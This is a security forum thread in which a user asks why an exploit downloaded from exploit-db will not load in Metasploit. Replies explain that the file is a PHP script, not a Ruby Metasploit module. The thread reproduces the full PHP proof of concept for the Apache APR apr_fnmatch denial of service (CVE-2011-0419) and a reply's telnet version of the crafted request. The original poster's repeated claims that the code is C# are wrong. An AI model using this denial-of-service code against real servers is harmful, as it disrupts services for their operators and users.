TheRoyalSloan Posted August 25, 2015 Share Posted August 25, 2015 I am completely unable to install exploits of my own or those downloaded from https://www.exploit-db.com in metasploit and went through the instructions set in this link:https://github.com/rapid7/metasploit-framework/wiki/Loading-External-Modules and all I get after i reload the modules in metasploit is "Failed to load module:........" I have entered in all of the correct file names and locations, and i just cannot think of anything else that could cure this solution. I have even tried copying the files to the parallel spot in the metasploit-framework file, I have tried everything I can possible think of. In short, the msfconsole will not recognize the new module path that I have created through the exploits folder in the .msf4 file, no matter what I try. I have tried reloading the modules, updating the msfconsole, etc. and whenever I tell the msfconsole to show me the new module path all I receive is an Invalid Parameter response and the number of exploits remains the same as if I had never created the new module path. Am I missing any steps to install exploits into metasploit?? Quote Link to comment Share on other sites More sharing options...
digip Posted August 25, 2015 Share Posted August 25, 2015 are the exploits you downloaded written in metasploit coded modules, or another scripting language? Post your code. Try looking at the Metasploit Unleashed section for some examples - https://www.offensive-security.com/metasploit-unleashed/shell/ Quote Link to comment Share on other sites More sharing options...
TheRoyalSloan Posted August 25, 2015 Author Share Posted August 25, 2015 Absolutely, here is a .php file from an exploit I downloaded from exploit-db.com that is labled Apache 1.4-2.2.x APR 'apr_fnmatch()' Denial of Service Vulnerability: source: http://www.securityfocus.com/bid/47820/infoApache APR is prone to a vulnerability that may allow attackers to cause a denial-of-service condition.Apache APR versions prior to 1.4.4 are vulnerable. <?php/*Apache 2.2.17 mod_autoindex local/remote Denial of Serviceauthor: Maksymilian ArciemowiczCVE: CVE-2011-0419CWE: CWE-399REMOTEFind some directory with supported mod_autoindex on the server. The directory should contain long filenames.http://[server]/[directory_with_mod_autoindex]/?P=*?*?*?[to 4k]LOCALTested on:127# httpd -v && uname -a Server version: Apache/2.2.17 (Unix)Server built: Dec 28 2010 13:21:44NetBSD localhost 5.1 NetBSD 5.1 (GENERIC) #0: Sun Nov 7 14:39:56 UTC 2010 builds@b6.netbsd.org:/home/builds/ab/netbsd-5-1-RELEASE/i386/201011061943Z-obj/home/builds/ab/netbsd-5-1-RELEASE/src/sys/arch/i386/compile/GENERIC i386Result:127# ls -la total 8drwxrwxrwx 2 root wheel 512 Feb 8 21:41 .drwxr-xr-x 7 www wheel 1024 Jan 31 08:49 ..-rw-r--r-- 1 www wheel 1056 Feb 8 19:39 .htaccess-rw-r--r-- 1 www wheel 0 Feb 8 19:39 cx.............................................................................................................................-rw-r--r-- 1 www wheel 1240 Feb 8 19:42 run.php127# ps -aux -p 617 USER PID %CPU %MEM VSZ RSS TTY STAT STARTED TIME COMMANDwww 617 98.6 0.4 10028 4004 ? R 7:38PM 121:43.17 /usr/pkg/sbin/httpd -k start Time = 121:43 and countingwhere http://[$localhost]:[$localport]/[$localuri]*/$localhost="localhost";$localport=80;$localuri="/koniec/";if(!is_writable(".")) die("!writable");// Phase 1// Create some filenametouch("cx".str_repeat(".",125));// Phase 2// Create .htaccess with unlink("./.htaccess");$htaccess=fopen("./.htaccess", "a");fwrite($htaccess,"AddDescription \"CVE-2011-0419\" ".str_repeat('*.',512)."\n");fclose($htaccess);// Phase 3// Local connect (bypass firewall restriction)while(1){ $fp = fsockopen($localhost, $localport, $errno, $errstr, 30); if (!$fp) echo "$errstr ($errno)<br />\n"; else { $out = "GET ".$localuri."/?P=".str_repeat("*?",1500)."* HTTP/1.1\r\n"; $out .= "Host: ".$localhost."\r\n"; $out .= "Connection: Close\r\n\r\n"; fwrite($fp, $out); fclose($fp); }}?>You can tell that the exploit is written in C# by how the flow control mechanism is defined at the end by "$out .= "Connection: Close\r\n\r\n"" Quote Link to comment Share on other sites More sharing options...
TheRoyalSloan Posted August 25, 2015 Author Share Posted August 25, 2015 Which of course rules the theory of coding issues out. If coding issues were the problem here the msfconsole would issue the "Failed to install module." response rather than "Failed to load module" when the exploit is called upon by the user in the msfconsole for use or when the module reload command is issued by the user the "Failed to install module" would also be given as a response if the coding issues were a problem for the exploit. Quote Link to comment Share on other sites More sharing options...
digip Posted August 25, 2015 Share Posted August 25, 2015 It's a PHP file. SAve as file.php, upload to a site, and run, it's PHP, not a metasploit module. you can tell by the code at the top of the file: ​ <?php Quote Link to comment Share on other sites More sharing options...
TheRoyalSloan Posted August 26, 2015 Author Share Posted August 26, 2015 I exceeded the number of posts I was able to submit on my original account so I had to create this new account to respond to your post. Modules can be saved as .txt, .php, .rb, and .py. You can see for yourself in the preloaded modules that come with Metasploit in the /usr/share/metasploit-framework/modules/exploits/... And this script seems to use C# send a request to PHP scripts running at the webserver and make PHP return data to C# application running on the desktop through internet. Quote Link to comment Share on other sites More sharing options...
TheRoyalSloan Posted August 26, 2015 Author Share Posted August 26, 2015 and to be more precise this script is for a denial of service attack which you can read more about at https://en.wikipedia.org/wiki/Denial-of-service_attack#Internet_Control_Message_Protocol_.28ICMP.29_flood. I say it is in C# because the author used C functions such as fclose ( https://en.wikibooks.org/wiki/C_Programming/C_Reference/stdio.h/fclose ) to inject the PHP scripts for this C application just as I vaguely said above. But what is important is why my Metasploit-Framework Console will not recognize the module paths I have created, I am very eager to find a solution as it is causing me much distress. Quote Link to comment Share on other sites More sharing options...
deadlyhabit Posted August 26, 2015 Share Posted August 26, 2015 (edited) It's a php file as /* Apache 2.2.17 mod_autoindex local/remote Denial of Service author: Maksymilian Arciemowicz CVE: CVE-2011-0419 CWE: CWE-399 REMOTE Find some directory with supported mod_autoindex on the server. The directory should contain long filenames. http://[server]/[directory_with_mod_autoindex]/?P=*?*?*?[to 4k] LOCAL Tested on: 127# httpd -v && uname -a Server version: Apache/2.2.17 (Unix) Server built: Dec 28 2010 13:21:44 NetBSD localhost 5.1 NetBSD 5.1 (GENERIC) #0: Sun Nov 7 14:39:56 UTC 2010 builds@b6.netbsd.org:/home/builds/ab/netbsd-5-1-RELEASE/i386/201011061943Z-obj/home/builds/ab/netbsd-5-1-RELEASE/src/sys/arch/i386/compile/GENERIC i386 Result: 127# ls -la total 8 drwxrwxrwx 2 root wheel 512 Feb 8 21:41 . drwxr-xr-x 7 www wheel 1024 Jan 31 08:49 .. -rw-r--r-- 1 www wheel 1056 Feb 8 19:39 .htaccess -rw-r--r-- 1 www wheel 0 Feb 8 19:39 cx............................................................................................................................. -rw-r--r-- 1 www wheel 1240 Feb 8 19:42 run.php 127# ps -aux -p 617 USER PID %CPU %MEM VSZ RSS TTY STAT STARTED TIME COMMAND www 617 98.6 0.4 10028 4004 ? R 7:38PM 121:43.17 /usr/pkg/sbin/httpd -k start Time = 121:43 and counting where http://[$localhost]:[$localport]/[$localuri] */ is a comment about its use/result Edited August 26, 2015 by deadlyhabit Quote Link to comment Share on other sites More sharing options...
cooper Posted August 26, 2015 Share Posted August 26, 2015 It's at the very least difficult (and I'd currently even say impossible but I'm still learning wrt C#) to create any C# program that: - doesn't contain the word 'class' - doesn't define a method/function - doesn't import anything Also, C# doesn't use the dot for string concatenation, which is what that snippet which you quote as evidence does. In C# that would've read += and in fact as far as I can tell PHP is the ONLY language to use a dot for string concatenation (a requirement from being loosely typed. If they used + what would 'echo 1 + 2' produce, 3 or 12?). Quote Link to comment Share on other sites More sharing options...
deadlyhabit Posted August 26, 2015 Share Posted August 26, 2015 (edited) it has no includes so not any c derivative, it's php at best (c/c++ nerd here) if not c derivative it's python (learning now) or ruby (no desire to learn) it's a basic logic chain that anyone coding can follow, but since i never fucked with php and thats the header... bingo. oh and from fucking around in unity c# would have some includes unless this is just a lazy exploit, which it doesn't seem to be, just run on dated shit. Edited August 26, 2015 by deadlyhabit Quote Link to comment Share on other sites More sharing options...
digip Posted August 26, 2015 Share Posted August 26, 2015 The above file posted, is strictly PHP. Anything in /* comment*/ is just that, a comment.fopen and fclose are part of the normal php codebase, and not exclusive to languages like c#. Some php.net reference for the op: http://php.net/manual/en/function.fopen.php http://php.net/manual/en/function.fclose.php Periods are continuation of code inline, like : $variable = $_POST['some_form_value'];echo "this is text in quotes and the following value: " . $variable . " is echoed back in the page";[code]poor example since this could be used wrapped directly in the quotes, but just an example of the concept.If the php file is a payaload to be uploaded after exploitation and then run on the target machine, that would make more sense, but by itself, does not make a metasploit module. Metasploit modules are written in ruby and look like so:https://www.exploit-db.com/exploits/16581/If you were to take the PHP file and port it over, you'd look for an msf module that uses http get requests and substitute the code.Searching the CVE I see one exploit: https://www.exploit-db.com/search/?action=search&cve=CVE-2011-0419&e_author=which if you click the source file link, spits out the PHP file, hence, php, not a metapsloit module, unlike the link I posted above, for 16581, which spits out an actual ruby .rb file. Quote Link to comment Share on other sites More sharing options...
TheRoyalSloan Posted August 26, 2015 Author Share Posted August 26, 2015 It is what it is, the code uses C# to inject PHP scripts to cause a DOS action, I have already listed a couple of examples on how that works. But the point of this forum is why my Metasploit-Framework Console will not recognize the module paths I have created, I am very eager to find a solution to this problem as it is causing me much distress. Any more comments about the code I posted as an example in a response to someones pointless confusion that has no relevance or any place at all here, WILL BE REPORTED. Stick to the topic and the problem at hand or do not post anything at all please. Quote Link to comment Share on other sites More sharing options...
digip Posted August 26, 2015 Share Posted August 26, 2015 (edited) It is what it is, the code uses C# to inject PHP scripts to cause a DOS action, I have already listed a couple of examples on how that works. But the point of this forum is why my Metasploit-Framework Console will not recognize the module paths I have created, I am very eager to find a solution to this problem as it is causing me much distress. Any more comments about the code I posted as an example in a response to someones pointless confusion that has no relevance or any place at all here, WILL BE REPORTED. Stick to the topic and the problem at hand or do not post anything at all please. https://www.offensive-security.com/metasploit-unleashed/porting-exploits/ by the way, files in /usr/share/metapsloit-framework/modules/exploits/####> are ruby files ending in .rb, not php. Even files in ..../modules/payloads/php are ruby files. Take a look at one of the php payloads. The thing I see above is, this requires a place to drop the file on the server and be run on the server(or i might be reading the exploit wrong). So to me, this would be like a post exploitation attack on the server after you get access to then drop it on the server. Looking at the php code, this attack happens on the localhost(I asume as a demonstration), even though the description states it's a remote exploit, this appears it's a POC as a local exploit. If you modified a GET request for an external site, and it was vulnerable, my guess is it causes apache to freeze and eventually DoS after it eats up resources. you could probably pull the same attack, with telnet, although not sure if the htaccess file and other stored file on the server are required in the full attack, the GET request would look like: telnet vulnsite.com 80 GET /pathrequired/?P=*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*? HTTP/1.1 HOST: vulnsite.com Connection: Close . Looking more at https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0419 and some of the exmaples, the files created on the server are also required. Can see another example here: http://cxsecurity.com/issue/WLB-2011050133 Edited August 26, 2015 by digip Quote Link to comment Share on other sites More sharing options...
cooper Posted August 26, 2015 Share Posted August 26, 2015 It is what it is, the code uses C# to inject PHP scripts to cause a DOS action, I have already listed a couple of examples on how that works. But the point of this forum is why my Metasploit-Framework Console will not recognize the module paths I have created, I am very eager to find a solution to this problem as it is causing me much distress. Any more comments about the code I posted as an example in a response to someones pointless confusion that has no relevance or any place at all here, WILL BE REPORTED. Stick to the topic and the problem at hand or do not post anything at all please. According to the comments the guy who wrote that code tested it on NetBSD. Please, oh genius with knowledge beyond his years, pray tell where the C# runtime comes in to execute it? Are you trying to argue the target is using mono? Quote Link to comment Share on other sites More sharing options...
digip Posted August 26, 2015 Share Posted August 26, 2015 According to the comments the guy who wrote that code tested it on NetBSD. Please, oh genius with knowledge beyond his years, pray tell where the C# runtime comes in to execute it? Are you trying to argue the target is using mono?Unless he's got something other than what he posted that he is referring to, he may just be confused by the syntax of the php script which to the point is just a delivery method to do the attack which can be done may other ways looking at the code more now, you need to create the htaccess file with the proper code, as well as create the cx... file with the long string of periods, and then on an apache server running vulnerable apr_fnmatch request the file via a GET request which in this case is done using PHP, which could be delivered a multitude of ways. Quote Link to comment Share on other sites More sharing options...
digininja Posted August 26, 2015 Share Posted August 26, 2015 The code is PHP, it isn't c#, anyone with basic programming knowledge can see that. Quote Link to comment Share on other sites More sharing options...
digininja Posted August 26, 2015 Share Posted August 26, 2015 And to your question of why it is failing in Metasploit, it is because Metasploit expects its exploits to be built as Metasploit modiles in Ruby, not php scripts which are designed to be ran on the command line. You can't just take something you randomly found on exploitdb and expect it to run in Metasploit. Quote Link to comment Share on other sites More sharing options...
digininja Posted August 26, 2015 Share Posted August 26, 2015 I'll have one more go at explaining this and try to answer some of the points you put in the report (I'm a moderator, I see the reports). MSF loads modules which are written in Ruby, it doesn't load random scripts, that is why you are getting the load error. If you want to add a new exploit you need to find one that is written as a MSF module and include that. Cooper did not say you can't execute C files on NetBSD (technically you can't, you run binaries which are compiled from C) he said that the script you are talkign about was tested on NetBSD And as you seem to doubt my credentials for being able to answer this question, there are a handful of modules I wrote in the main MSF trunk. You could also try taking your question to the Metasploit mailing list or IRC channel if you don't like the answers you are getting here. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.